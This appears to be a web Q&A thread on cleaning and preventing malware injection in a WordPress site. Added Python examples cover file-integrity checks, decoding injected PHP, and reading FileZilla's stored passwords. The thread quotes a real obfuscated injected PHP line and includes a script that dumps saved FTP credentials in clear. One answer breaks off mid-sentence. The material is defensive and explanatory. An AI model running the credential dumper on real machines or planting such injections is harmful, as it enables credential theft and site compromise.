How to prevent my website from getting malware injection attacks?
My website was banned as a malware website by Google. When I checked the code, I found out that some code had been injected into many files on my server. I cleaned everything manually, editing all the files on my server (shared hosting) by searching all the files for a string taken from the injected code. Even the .htaccess file had been modified by the attacker.
There were two WordPress installations on the website, in two different subfolders of the website root, which had not been updated. I updated both.
Then Google removed the ban on my website.
Yesterday, I found out that the .htaccess file on my website had again been modified by the attacker. Here is the code:
I searched for "b58b6f" in all the files, but could not find it anywhere. I think this is the only file modified by the most recent attack. I deleted this .htaccess file, as I don't need it.
How was the hacker able to hack my website? How can I prevent this from happening again? How can I make my website more secure?
Do you have your website in subversion (or similar)? An hourly `svn status` cron job can alert you very quickly to *any* changes and a manual `svn revert` can remove all the changes.
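An added example, not part of the comment above, of the same idea when the shared host has no Subversion client: a SHA-256 manifest of the document root is written once after the clean-up, and each later run (for instance from an hourly cron job) diffs the live tree against it, so a rewritten .htaccess or a newly dropped file shows up immediately. The directory layout, the baseline file name and the "attacker" edits in demo() are constructed for the example.

```python
import hashlib
import json
import tempfile
from pathlib import Path

# Assumed name of the baseline manifest, stored in the document root for the
# demo. In practice keep a copy off the host too: anyone who can rewrite
# .htaccess can also rewrite a manifest that lives next to it.
BASELINE_NAME = ".integrity-baseline.json"


def hash_file(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large uploads do not load into memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(docroot: Path) -> dict:
    """Map of relative path -> hash for every regular file under docroot.

    Path.rglob("*") includes dot-files, so .htaccess is covered."""
    manifest = {}
    for p in sorted(docroot.rglob("*")):
        if p.is_file() and p.name != BASELINE_NAME:
            manifest[p.relative_to(docroot).as_posix()] = hash_file(p)
    return manifest


def save_baseline(docroot: Path) -> None:
    """Run once, right after the site has been cleaned and updated."""
    (docroot / BASELINE_NAME).write_text(json.dumps(build_manifest(docroot), indent=1))


def compare_to_baseline(docroot: Path) -> dict:
    """The cron-job half: report added, removed and modified files."""
    baseline = json.loads((docroot / BASELINE_NAME).read_text())
    current = build_manifest(docroot)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in current if k in baseline and current[k] != baseline[k]),
    }


def demo() -> dict:
    """Constructed scenario: clean site, baseline taken, then a second visit by the attacker."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp1").mkdir()
        (root / ".htaccess").write_text("RewriteEngine On\n")
        (root / "wp1" / "index.php").write_text("<?php echo 'ok';\n")
        save_baseline(root)
        # Simulated attacker activity (constructed): .htaccess rewritten, file dropped.
        (root / ".htaccess").write_text("RewriteEngine On\n# constructed malicious edit\n")
        (root / "wp1" / "x.php").write_text("<?php // constructed dropped file\n")
        return compare_to_baseline(root)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Any non-empty "added" or "modified" list is the alert; a hash comparison also catches edits that preserve file size and timestamp, which a plain `ls -l` check would miss.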
I think this answer might apply to your situation. http://security.stackexchange.com/questions/16305/determining-the-point-of-compromise-on-an-infected-web-server/16322#16322
It seems that the malware you encountered is the "daysofyorr.com virus" or MW:HTA:7.
I suspect that you use FileZilla as your FTP client. If so, you should know that FileZilla stores the credentials of your websites in plain text. A virus may have accessed your credentials and then accessed all your registered websites, searching for WordPress installs in order to update the files by inserting this code.
Now, you should:
- Search your computer for any viruses, malware, etc.
- Change the FTP password of all your registered FTP accounts saved in FileZilla
- Possibly switch to a better FTP client, like WinSCP
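To show what the answer above means by "plain text", here is an added example (not part of the answer) that reads a FileZilla sitemanager.xml and prints every stored site with its password. The XML is a constructed sample in the shape FileZilla writes under %APPDATA%\FileZilla\; it assumes that older versions stored the <Pass> element as plain text and that later versions wrap it in base64 (an encoding, not encryption), so both forms are handled.

```python
import base64
import os
import xml.etree.ElementTree as ET

# Constructed sample of %APPDATA%\FileZilla\sitemanager.xml with two entries:
# one old-style plain-text <Pass>, one newer base64-encoded <Pass>.
# Hosts, users and passwords are made up for the example.
SAMPLE_SITEMANAGER = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.5.3" platform="windows">
  <Servers>
    <Server>
      <Host>ftp.example.invalid</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Type>0</Type>
      <User>siteowner</User>
      <Pass>hunter2</Pass>
      <Logontype>1</Logontype>
      <Name>Old-style entry</Name>
    </Server>
    <Server>
      <Host>ftp.example.invalid</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <Type>0</Type>
      <User>wpadmin</User>
      <Pass encoding="base64">Y29ycmVjdGhvcnNl</Pass>
      <Logontype>1</Logontype>
      <Name>Newer-style entry</Name>
    </Server>
  </Servers>
</FileZilla3>
"""


def default_sitemanager_path() -> str:
    """Where FileZilla keeps the file on Windows (assumption: %APPDATA%\\FileZilla)."""
    return os.path.join(os.environ.get("APPDATA", ""), "FileZilla", "sitemanager.xml")


def extract_credentials(xml_text: str) -> list:
    """Return one dict per <Server> with the password recovered in clear.

    No key, no user interaction: anything running as the logged-in user
    (malware included) can do exactly this."""
    root = ET.fromstring(xml_text)
    found = []
    for server in root.iter("Server"):
        pass_el = server.find("Pass")
        password = None
        if pass_el is not None and pass_el.text is not None:
            if pass_el.get("encoding") == "base64":
                password = base64.b64decode(pass_el.text).decode("utf-8", errors="replace")
            else:
                password = pass_el.text
        found.append({
            "name": server.findtext("Name"),
            "host": server.findtext("Host"),
            "port": int(server.findtext("Port") or 21),
            # Protocol 0 is plain FTP in FileZilla's numbering (assumption for
            # this example), so the same password also crosses the network in clear.
            "protocol": server.findtext("Protocol"),
            "user": server.findtext("User"),
            "password": password,
        })
    return found


if __name__ == "__main__":
    for entry in extract_credentials(SAMPLE_SITEMANAGER):
        print(f"{entry['name']}: {entry['user']}@{entry['host']}:{entry['port']} -> {entry['password']}")
```

Run it against the real file with extract_credentials(open(default_sitemanager_path()).read()) to see which sites a credential-stealing infection would have been able to log into; every one of them needs its password changed, not only the site that was found defaced.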
A late comment, but I suspect that you use FileZilla as your FTP client. Did you know that FileZilla stores your FTP site credentials (site/user/pass) in a plain text file in the %APPDATA% folder?
And I also suspect there is a hidden malware on your computer. It grabbed your FileZilla credential files, and used them to change your header.php file in your theme folder. In fact, I suspect that you will find a changed header.php in all of your theme folders.
And if you are technical enough to look at your FTP log files, you will find the access to those files: a download, then an upload of the changed files. You might also find some random file names that were uploaded to your root ('home') folder, although those files were deleted by the hacker.
And, you will find that the IP address in the FTP log of the hacker was from China.
Recommendation: uninstall FileZilla, delete the FileZilla folder from the %APPDATA% folder, change your FTP passwords (and your host passwords). And look for any changed
For the "daysofyorr.com virus", you can confirm this by checking some of your PHP files (like index.php), if you find this code:
#b58b6f# echo(gzinflate(base64_decode("JctRCoAgDADQq8gO4P5DvcuwRUmhbKPl7fvw98FLWuUaFmwOzmD8GTZ6aSkElZrhNBsborvHnab2Y3aRWPuDwjeTcmwKJeFK5Qc="))); #/b58b6f#
For information, it translates into:
Which seems to lead to a 404 nowadays.
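As an added example (not part of the answer above), the following scanner finds the `#xxxxxx# echo(gzinflate(base64_decode("..."))); #/xxxxxx#` marker in PHP source, decodes the payload the way PHP's gzinflate() would (raw DEFLATE, no zlib or gzip header), and strips the injection so the file can be restored. The sample index.php and its payload are constructed here, so the decoded text is known; the real payload from the page can be fed to the same function, and the pattern tolerates the curly quotes and line-wrapped base64 that copies pasted from web pages tend to have.

```python
import base64
import re
import zlib

# Injection marker seen in the compromised PHP files:
#   #<6 hex chars># echo(gzinflate(base64_decode("..."))); #/<same hex chars>#
# Curly quotes are accepted, and whitespace inside the base64 is tolerated.
INJECTION_RE = re.compile(
    r'#([0-9a-f]{6})#\s*echo\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*'
    r'["\u201c\u201d]([A-Za-z0-9+/=\s]+)["\u201c\u201d]\s*\)\s*\)\s*\)\s*;\s*#/\1#',
    re.DOTALL,
)


def php_gzinflate(data: bytes) -> bytes:
    """PHP's gzinflate() is raw DEFLATE: wbits=-15 tells zlib to expect no header."""
    return zlib.decompress(data, -15)


def php_gzdeflate(data: bytes) -> bytes:
    """Inverse of php_gzinflate(); used only to build the constructed sample below."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


def decode_injection(b64: str) -> str:
    raw = base64.b64decode(re.sub(r"\s+", "", b64))
    return php_gzinflate(raw).decode("utf-8", errors="replace")


def find_injections(php_source: str) -> list:
    """Every marker block in the source, with its decoded payload (or the decode error)."""
    hits = []
    for m in INJECTION_RE.finditer(php_source):
        marker, b64 = m.group(1), m.group(2)
        try:
            decoded = decode_injection(b64)
        except (ValueError, zlib.error) as e:
            decoded = f"<decode failed: {e}>"
        hits.append({"marker": marker, "span": m.span(), "decoded": decoded})
    return hits


def strip_injections(php_source: str) -> str:
    """Remove the marker blocks; the rest of the file is left untouched."""
    return INJECTION_RE.sub("", php_source)


# Constructed sample: a hypothetical payload and a WordPress index.php carrying it.
# Neither the payload nor the marker value is the one from the page.
SAMPLE_PAYLOAD = '<iframe src="http://example.invalid/in.php" width="1" height="1"></iframe>'
SAMPLE_B64 = base64.b64encode(php_gzdeflate(SAMPLE_PAYLOAD.encode())).decode()
SAMPLE_INDEX_PHP = (
    "<?php\n"
    f"#a1b2c3# echo(gzinflate(base64_decode(\"{SAMPLE_B64}\"))); #/a1b2c3#\n"
    "/** WordPress front controller (constructed stand-in) */\n"
    "define('WP_USE_THEMES', true);\n"
    "require('./wp-blog-header.php');\n"
)


if __name__ == "__main__":
    for hit in find_injections(SAMPLE_INDEX_PHP):
        print(f"marker {hit['marker']} at {hit['span']}: {hit['decoded']}")
    print(strip_injections(SAMPLE_INDEX_PHP))
```

Searching for the literal marker string, as the question did, only finds this one campaign's files; the decoded payload is what tells you where the injected traffic was being sent, which is the indicator worth searching the rest of the server and the FTP logs for.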